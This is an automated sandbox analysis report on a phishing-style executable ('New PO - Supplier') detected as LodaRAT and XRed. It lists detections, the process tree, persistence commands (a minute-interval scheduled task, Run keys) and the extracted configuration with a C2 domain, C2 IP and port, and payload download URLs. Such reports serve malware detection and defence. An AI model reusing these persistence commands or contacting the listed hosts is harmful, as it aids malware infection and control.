Windows Analysis Report
New PO - Supplier 0202AW-PER2.exe

Overview

General Information

Sample name: New PO - Supplier 0202AW-PER2.exe
Analysis ID: 1580482
MD5: 17fb4f9df5175e684a3427c5997b2007
SHA1: c7b207497e0171fbb8fca648d82753abbf42b0b8
SHA256: 8f66247597f18a7b3f20dbdf2d29330f716222bd500a7a95642137e84fa3b3d3
Tags: exeuser-malrpt
Infos:

Detection

LodaRAT, XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • New PO - Supplier 0202AW-PER2.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe" MD5: 17FB4F9DF5175E684A3427C5997B2007)
    • ._cache_New PO - Supplier 0202AW-PER2.exe (PID: 3848 cmdline: "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
      • cmd.exe (PID: 2536 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 5652 cmdline: schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 3704 cmdline: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 4076 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: B30E717CDE0FA4A5DE907A7148308430)
      • WerFault.exe (PID: 10076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 23736 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 17084 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 1896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 14008 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 736 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 10224 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • NUHORT.exe (PID: 2000 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • NUHORT.exe (PID: 7600 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • Synaptics.exe (PID: 8156 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: B30E717CDE0FA4A5DE907A7148308430)
  • NUHORT.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • NUHORT.exe (PID: 3396 cmdline: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe" MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • NUHORT.exe (PID: 8664 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • NUHORT.exe (PID: 10176 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • NUHORT.exe (PID: 4824 cmdline: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe MD5: 7E05F5F77F8A0F63634CD734AE52CE55)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Loda, LodaRAT | Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings
New PO - Supplier 0202AW-PER2.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |
New PO - Supplier 0202AW-PER2.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_LodaRat_1 | Yara detected LodaRAT | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\QHCPYO.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
C:\Users\user\Documents\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Users\user\Documents\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\Synaptics.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\ProgramData\Synaptics\Synaptics.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000001.00000002.4549568281.000000000411C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000006.00000002.4540189896.0000000003430000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000006.00000002.4538842367.0000000003158000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
0.0.New PO - Supplier 0202AW-PER2.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
0.0.New PO - Supplier 0202AW-PER2.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

                                System Summary

                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, Initiated: true, ProcessId: 3848, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49747
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ParentProcessId: 3848, ParentProcessName: ._cache_New PO - Supplier 0202AW-PER2.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, ProcessId: 3704, ProcessName: wscript.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ParentProcessId: 3848, ParentProcessName: ._cache_New PO - Supplier 0202AW-PER2.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, ProcessId: 3704, ProcessName: wscript.exe
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ParentProcessId: 3848, ParentProcessName: ._cache_New PO - Supplier 0202AW-PER2.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, ProcessId: 3704, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ProcessId: 3848, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QHCPYO
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ProcessId: 3848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QHCPYO.lnk
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, CommandLine: schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2536, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1, ProcessId: 5652, ProcessName: schtasks.exe
                                Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" , ParentImage: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, ParentProcessId: 3848, ParentProcessName: ._cache_New PO - Supplier 0202AW-PER2.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, ProcessId: 3704, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe, ProcessId: 6636, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 4076, TargetFilename: C:\Users\user\AppData\Local\Temp\ExL2BsMQ.xlsm
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T18:20:20.769709+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49776 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:58.443180+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
2024-12-24T18:21:42.237001+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
2024-12-24T18:22:25.713716+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
2024-12-24T18:23:02.164540+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
2024-12-24T18:23:40.182859+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
2024-12-24T18:24:24.239329+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.4 | 49801 | TCP
2024-12-24T18:20:11.099872+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 69.42.215.252 | 80 | TCP
2024-12-24T18:20:03.412054+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49776 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:03.412054+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:03.412054+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49801 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:11.584241+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:20.769709+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49776 | 172.111.138.100 | 5552 | TCP
2024-12-24T18:20:29.892187+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49801 | 172.111.138.100 | 5552 | TCP

                                AV Detection

                                Source: New PO - Supplier 0202AW-PER2.exeAvira: detected
                                Source: http://xred.site50.net/syn/SSLLibrary.dlAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/Synaptics.rar8Avira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SSLLibrary.dllAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/Synaptics.rarAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SUpdate.iniAvira URL Cloud: Label: malware
                                Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\QHCPYO.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\RCX76FB.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\RCX76FB.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: New PO - Supplier 0202AW-PER2.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                                Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeReversingLabs: Detection: 50%
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeReversingLabs: Detection: 50%
                                Source: New PO - Supplier 0202AW-PER2.exeReversingLabs: Detection: 92%
                                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 96.6% probability
                                Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\RCX76FB.tmpJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeJoe Sandbox ML: detected
                                Source: New PO - Supplier 0202AW-PER2.exeJoe Sandbox ML: detected
                                Source: New PO - Supplier 0202AW-PER2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49734 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49735 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49742 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49741 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49745 version: TLS 1.2
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: [autorun]
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: autorun.inf
                                Source: New PO - Supplier 0202AW-PER2.exe Binary or memory string: [autorun]
                                Source: New PO - Supplier 0202AW-PER2.exe Binary or memory string: autorun.inf
                                Source: ~$cache1.2.dr Binary or memory string: [autorun]
                                Source: ~$cache1.2.dr Binary or memory string: autorun.inf
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EBDD92 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00EBDD92
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EF2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00EF2044
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EF219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00EF219F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EF24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00EF24A9
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EE6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_00EE6B3F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EE6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_00EE6E4A
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EEF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00EEF350
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EEFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00EEFDD2
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Code function: 1_2_00EEFD47 FindFirstFileW,FindClose,1_2_00EEFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_000C2044
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_000C219F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_000C24A9
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_000B6B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_000B6E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_000BF350
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000BFD47 FindFirstFileW,FindClose,9_2_000BFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_0008DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0008DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe Code function: 9_2_000BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_000BFDD2
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user\AppData\Roaming
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
